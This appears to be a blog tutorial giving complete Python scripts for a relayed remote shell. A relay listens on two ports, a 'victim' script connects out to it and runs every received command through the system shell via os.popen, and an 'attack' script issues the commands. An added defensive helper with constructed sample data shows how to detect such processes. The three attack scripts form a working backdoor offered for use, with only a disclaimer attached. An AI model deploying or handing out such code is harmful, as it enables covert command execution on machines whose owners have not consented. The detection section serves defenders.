Port forwarding and relaying a shell in Python
Background knowledge
1. The socket module
2. The os.popen() function from the os module
For the socket module, any of the existing tutorials will do. For os.popen(), here is an example:
# coding:utf-8
import os
while True:
    dosf = input("输入命令>>")              # prompt: "Enter command>>"
    if dosf == "exit":
        break
    res = os.popen(dosf).read()             # run the command and collect its output
    print(res)
As you can see, input() returns the command as a str; popen() executes it and returns a file-like object, and that object's read() returns the result of running the command.
Schematic diagram
Source code
Note: no exception handling is done.
1. relay.py
from socket import *
l1 = socket(AF_INET, SOCK_STREAM)           # listener for attack.py
l2 = socket(AF_INET, SOCK_STREAM)           # listener for victim.py
addr1 = ('192.168.1.24', 4000)
addr2 = ('192.168.1.24', 4001)
l1.bind(addr1)
l2.bind(addr2)
l1.listen(1)
l2.listen(1)
s1, attack = l1.accept()                    # wait for the attacker side first
print(attack, "attk接入")                   # "attk connected"
s2, victim = l2.accept()                    # then the victim side
print(victim, "vict接入")                   # "vict connected"
while True:
    attk = s1.recv(1024)                    # command from attack.py
    print("attk:", attk.decode())
    if attk == b"quit":                     # tear everything down on "quit"
        l1.close()
        l2.close()
        s1.close()
        s2.close()
        break
    s2.send(attk)                           # forward the command to victim.py
    info = s2.recv(1024)                    # read back at most 1024 bytes of output
    print("vict:", info.decode())
    s1.send(info)                           # return the output to attack.py
2. victim.py
from socket import *
import os
# The next three lines were needed when running on Linux under Python 2, otherwise
# the encode/decode calls could raise; Python 3 has no reload() or
# sys.setdefaultencoding(), so they are only run on Python 2.
import sys
if sys.version_info[0] < 3:
    reload(sys)
    sys.setdefaultencoding('utf8')
####
sock = socket(AF_INET, SOCK_STREAM)
sock.connect(('192.168.1.24', 4001))        # connect to the relay's victim-side port
while True:
    data = sock.recv(1024)                  # command forwarded by relay.py
    if not data:                            # relay closed the connection
        break
    dosf = os.popen(data.decode())          # run it through the system shell
    info = dosf.read()                      # collect its output
    sock.send(info.encode())                # send the output back to the relay
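Seen from the defender's side, as an added example that is not part of the original post: on Linux, os.popen() runs each received command through "/bin/sh -c", so a victim.py-style process shows up as an interpreter holding an established TCP connection while repeatedly spawning "sh -c" children. The Proc and Conn records below are constructed sample data modelled on the fields a collector would read from /proc/<pid>/ and /proc/net/tcp, and find_socket_backed_shells() is a hypothetical detection helper.

```python
from dataclasses import dataclass

@dataclass
class Proc:                      # one process, as read from /proc/<pid>/ (assumed shape)
    pid: int
    ppid: int
    cmdline: list

@dataclass
class Conn:                      # one TCP connection owned by a pid (assumed shape)
    pid: int
    raddr: tuple
    state: str

INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "php"}
SHELLS = {"sh", "bash", "dash", "zsh"}

def _base(cmdline):
    """Basename of argv[0], e.g. '/usr/bin/python3' -> 'python3'."""
    return cmdline[0].rsplit("/", 1)[-1] if cmdline else ""

def find_socket_backed_shells(procs, conns):
    """Sorted (pid, remote_addr) pairs for interpreters that hold an ESTABLISHED
    TCP connection and have a child running 'sh -c ...'."""
    by_pid = {p.pid: p for p in procs}
    established = {c.pid: c.raddr for c in conns if c.state == "ESTABLISHED"}
    hits = set()
    for p in procs:
        if _base(p.cmdline) not in SHELLS or "-c" not in p.cmdline:
            continue                      # not a 'sh -c <cmd>' child
        parent = by_pid.get(p.ppid)
        if parent and _base(parent.cmdline) in INTERPRETERS and parent.pid in established:
            hits.add((parent.pid, established[parent.pid]))
    return sorted(hits)

# Constructed sample: pid 4120 is victim.py connected to the relay on port 4001 and has
# just spawned 'sh -c whoami' via os.popen(); pid 4200 also spawns a shell but holds no
# socket, and pid 900 holds a socket but spawns no shell, so neither should be flagged.
SAMPLE_PROCS = [
    Proc(1, 0, ["/sbin/init"]),
    Proc(900, 1, ["/usr/sbin/sshd"]),
    Proc(4120, 1, ["/usr/bin/python3", "victim.py"]),
    Proc(4133, 4120, ["/bin/sh", "-c", "whoami"]),
    Proc(4200, 1, ["/usr/bin/python3", "app.py"]),
    Proc(4201, 4200, ["/bin/sh", "-c", "ls"]),
]
SAMPLE_CONNS = [
    Conn(900, ("10.0.0.5", 51234), "ESTABLISHED"),
    Conn(4120, ("192.168.1.24", 4001), "ESTABLISHED"),
]
if __name__ == "__main__":
    for pid, remote in find_socket_backed_shells(SAMPLE_PROCS, SAMPLE_CONNS):
        print(f"pid {pid}: interpreter with live socket to {remote} spawning sh -c")
```

A real collector would refresh both lists on a short interval, since the "sh -c" child only lives as long as the command it runs.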
3. attack.py
from socket import *
client = socket(AF_INET, SOCK_STREAM)
client.connect(('192.168.1.24', 4000))      # connect to the relay's attacker-side port
while True:
    data = input('Shell >>')
    client.send(data.encode())              # send the command to the relay
    print('Execute:', data)
    if data == "quit":                      # relay closes both sides on "quit"
        break
    data = client.recv(1024)                # output relayed back from victim.py
    print('Receive:', data.decode())
Disclaimer: this is an original article shared for technical purposes; use for any illegal purpose is prohibited, violators bear the consequences themselves, and the blog owner is not responsible.